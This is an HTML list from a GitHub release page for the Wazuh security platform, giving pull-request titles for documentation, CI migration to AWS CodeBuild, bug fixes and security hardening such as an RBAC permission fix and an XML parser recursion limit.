<li>Add Manager 5.0 release notes and breaking changes by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ignaciogalle12git/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ignaciogalle12git">@ignaciogalle12git</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4648591326" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36850" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36850/hovercard" href="https://github.com/wazuh/wazuh/pull/36850">#36850</a></li>
<li>ci(gha): migrate server/manager workflows to AWS CodeBuild runners [main] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4692375185" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37012" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37012/hovercard" href="https://github.com/wazuh/wazuh/pull/37012">#37012</a></li>
<li>chore: update vulnerable Python framework dependencies by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4699088509" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37024" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37024/hovercard" href="https://github.com/wazuh/wazuh/pull/37024">#37024</a></li>
<li>Add Manager 5.0 wazuh-manager.conf configuration reference by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4691339394" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36999" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36999/hovercard" href="https://github.com/wazuh/wazuh/pull/36999">#36999</a></li>
<li>Add virustotal migration guide by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jepalfer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jepalfer">@jepalfer</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4692765810" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37013" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37013/hovercard" href="https://github.com/wazuh/wazuh/pull/37013">#37013</a></li>
<li>Add VD migration documentation by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ignaciogalle12git/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ignaciogalle12git">@ignaciogalle12git</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4692092118" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37008" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37008/hovercard" href="https://github.com/wazuh/wazuh/pull/37008">#37008</a></li>
<li>Add documentation for wpk upgrade by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Antoniogm03/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Antoniogm03">@Antoniogm03</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4693271310" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37015" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37015/hovercard" href="https://github.com/wazuh/wazuh/pull/37015">#37015</a></li>
<li>Migrate agent build workflows to AWS CodeBuild runners by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Nicogp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Nicogp">@Nicogp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4701880741" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37028" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37028/hovercard" href="https://github.com/wazuh/wazuh/pull/37028">#37028</a></li>
<li>XML Decoders migration to YAML by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jepalfer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jepalfer">@jepalfer</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4673566639" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36959" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36959/hovercard" href="https://github.com/wazuh/wazuh/pull/36959">#36959</a></li>
<li>CDB to KVDB migration guide by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jepalfer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jepalfer">@jepalfer</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4690514873" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36996" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36996/hovercard" href="https://github.com/wazuh/wazuh/pull/36996">#36996</a></li>
<li>Documentation of Agentless migration to 5.x by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Antoniogm03/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Antoniogm03">@Antoniogm03</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4699204980" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37025" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37025/hovercard" href="https://github.com/wazuh/wazuh/pull/37025">#37025</a></li>
<li>Fix manager reload/restart silently fails by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ignaciogalle12git/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ignaciogalle12git">@ignaciogalle12git</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4673792785" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36962" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36962/hovercard" href="https://github.com/wazuh/wazuh/pull/36962">#36962</a></li>
<li>Randomize key generation for installation by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jepalfer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jepalfer">@jepalfer</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4651010813" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36861" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36861/hovercard" href="https://github.com/wazuh/wazuh/pull/36861">#36861</a></li>
<li>Retry vulnerability feed validation failures promptly by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4665777430" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36874" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36874/hovercard" href="https://github.com/wazuh/wazuh/pull/36874">#36874</a></li>
<li>Bump 5.0.0 branch by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wazuhci/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wazuhci">@wazuhci</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4716517657" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37040" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37040/hovercard" href="https://github.com/wazuh/wazuh/pull/37040">#37040</a></li>
<li>Fix agent permanently stuck when TCP connection is silently half-closed by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nbertoldo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nbertoldo">@nbertoldo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4616576722" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36790" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36790/hovercard" href="https://github.com/wazuh/wazuh/pull/36790">#36790</a></li>
<li>ci(gha): migrate server/manager workflows to AWS CodeBuild runners [4.14.6] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4692373330" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37010" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37010/hovercard" href="https://github.com/wazuh/wazuh/pull/37010">#37010</a></li>
<li>ci(gha): migrate server/manager workflows to AWS CodeBuild runners [4.14.7] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4692374310" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37011" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37011/hovercard" href="https://github.com/wazuh/wazuh/pull/37011">#37011</a></li>
<li>fix: correct blob URL refs for release branch by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4718016446" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37046" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37046/hovercard" href="https://github.com/wazuh/wazuh/pull/37046">#37046</a></li>
<li>Use restricted wazuh-server user for Manager Indexer authentication by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4724661439" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37061" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37061/hovercard" href="https://github.com/wazuh/wazuh/pull/37061">#37061</a></li>
<li>fix(packages): use wazuh-manager-control in manager init.d scripts by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4724166255" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37059" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37059/hovercard" href="https://github.com/wazuh/wazuh/pull/37059">#37059</a></li>
<li>fix: Update the unclassified event doc by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/juliancnn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/juliancnn">@juliancnn</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4726479817" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37126" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37126/hovercard" href="https://github.com/wazuh/wazuh/pull/37126">#37126</a></li>
<li>Skip vanished /proc entries during ports scan by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Nicogp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Nicogp">@Nicogp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4650163579" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36859" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36859/hovercard" href="https://github.com/wazuh/wazuh/pull/36859">#36859</a></li>
<li>Fix RBAC permission check to verify allow effect in update_config rules by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vikman90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vikman90">@vikman90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4724800552" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37076" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37076/hovercard" href="https://github.com/wazuh/wazuh/pull/37076">#37076</a></li>
<li>Add destination confinement to worker non-merged and extra file sync paths by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4691222179" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36998" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36998/hovercard" href="https://github.com/wazuh/wazuh/pull/36998">#36998</a></li>
<li>Patch cluster authentication by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ignaciogalle12git/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ignaciogalle12git">@ignaciogalle12git</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4716191480" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37039" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37039/hovercard" href="https://github.com/wazuh/wazuh/pull/37039">#37039</a></li>
<li>Lower stale-session indexer log to debug by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4733981786" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37150" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37150/hovercard" href="https://github.com/wazuh/wazuh/pull/37150">#37150</a></li>
<li>Limit recursion depth in XML parser by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vikman90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vikman90">@vikman90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4733223430" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37147" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37147/hovercard" href="https://github.com/wazuh/wazuh/pull/37147">#37147</a></li>
<li>Add status endpoint by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/NahuFigueroa97/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/NahuFigueroa97">@NahuFigueroa97</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4696177149" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37022" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37022/hovercard" href="https://github.com/wazuh/wazuh/pull/37022">#37022</a></li>
<li>Add log collectors reference docs by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AnDumu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AnDumu">@AnDumu</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4721989446" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37057" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37057/hovercard" href="https://github.com/wazuh/wazuh/pull/37057">#37057</a></li>
<li>Run the Windows MSI package test on the AWS CodeBuild runner by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nbertoldo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nbertoldo">@nbertoldo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4738105790" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37165" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37165/hovercard" href="https://github.com/wazuh/wazuh/pull/37165">#37165</a></li>
<li>Remove merged.mg hash cache to fix stale syscollector flush by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hernanvalenzuela/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hernanvalenzuela">@hernanvalenzuela</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4720281364" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37048" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37048/hovercard" href="https://github.com/wazuh/wazuh/pull/37048">#37048</a></li>
<li>Enrich MITRE fields with id and names by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fcontrerasc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fcontrerasc">@fcontrerasc</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4721520471" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37054" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37054/hovercard" href="https://github.com/wazuh/wazuh/pull/37054">#37054</a></li>
<li>Reduce indexer connection warning noise by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jam300/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jam300">@jam300</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4696113780" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37021" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37021/hovercard" href="https://github.com/wazuh/wazuh/pull/37021">#37021</a></li>
<li>Remove deprecated wazuh-dbd daemon by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vikman90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vikman90">@vikman90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4715728814" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37035" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37035/hovercard" href="https://github.com/wazuh/wazuh/pull/37035">#37035</a></li>
<li>Bound decompressed size when processing sync archives by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4725313255" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37119" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37119/hovercard" href="https://github.com/wazuh/wazuh/pull/37119">#37119</a></li>
<li>Bump 4.14.6 branch by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wazuhci/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wazuhci">@wazuhci</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4742531433" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37176" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37176/hovercard" href="https://github.com/wazuh/wazuh/pull/37176">#37176</a></li>
<li>Add libcrypt fix (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4614551071" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36782" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36782/hovercard" href="https://github.com/wazuh/wazuh/pull/36782">#36782</a>) to 4.14.6 changelog by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4743056771" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37178" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37178/hovercard" href="https://github.com/wazuh/wazuh/pull/37178">#37178</a></li>
<li>Delay IndexerDownloader connection warnings until 3 failed attempts by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4742582733" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37177" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37177/hovercard" href="https://github.com/wazuh/wazuh/pull/37177">#37177</a></li>
<li>Add parameterized target selection to Coverity scan workflow by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lchico/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lchico">@lchico</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4740074465" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37171" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37171/hovercard" href="https://github.com/wazuh/wazuh/pull/37171">#37171</a></li>
<li>Align remoted tier 2 CodeBuild setup by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4735418555" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37155" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37155/hovercard" href="https://github.com/wazuh/wazuh/pull/37155">#37155</a></li>
<li>Add rules migration guide by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Jorgesnchz/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Jorgesnchz">@Jorgesnchz</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4495888102" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36305" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36305/hovercard" href="https://github.com/wazuh/wazuh/pull/36305">#36305</a></li>
<li>Migrate agent Linux/Windows test workflows to AWS CodeBuild runners by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Nicogp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Nicogp">@Nicogp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4720554249" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37051" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37051/hovercard" href="https://github.com/wazuh/wazuh/pull/37051">#37051</a></li>
<li>Silence spurious keepalive warnings on the Windows agent by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nbertoldo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nbertoldo">@nbertoldo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4745531717" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37187" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37187/hovercard" href="https://github.com/wazuh/wazuh/pull/37187">#37187</a></li>
<li>wazuh-engine: Improve log messages and logger by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/juliancnn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/juliancnn">@juliancnn</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4688784533" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36995" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36995/hovercard" href="https://github.com/wazuh/wazuh/pull/36995">#36995</a></li>
<li>Set default indexer connector credentials by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TomasTurina/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TomasTurina">@TomasTurina</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4746445718" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37192" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37192/hovercard" href="https://github.com/wazuh/wazuh/pull/37192">#37192</a></li>
<li>Fix incorrect snprintf size calculation in winevtchannel decoder by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vikman90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vikman90">@vikman90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4750564321" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37198" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37198/hovercard" href="https://github.com/wazuh/wazuh/pull/37198">#37198</a></li>
<li>Align VD feed-download log levels with indexer consumer state by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4750803257" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37199" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37199/hovercard" href="https://github.com/wazuh/wazuh/pull/37199">#37199</a></li>
<li>Recognize renamed indexer consumer status in engine sync by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4751474129" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37204" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37204/hovercard" href="https://github.com/wazuh/wazuh/pull/37204">#37204</a></li>
<li>Merge 4.14.6 into 4.14.7 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4752903836" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37210" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37210/hovercard" href="https://github.com/wazuh/wazuh/pull/37210">#37210</a></li>
<li>Token replacement to avoid permission errors by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MarcelKemp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MarcelKemp">@MarcelKemp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4753550212" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37237" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37237/hovercard" href="https://github.com/wazuh/wazuh/pull/37237">#37237</a></li>
<li>Merge 4.14.7 into 5.0.0 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4752941791" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37211" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37211/hovercard" href="https://github.com/wazuh/wazuh/pull/37211">#37211</a></li>
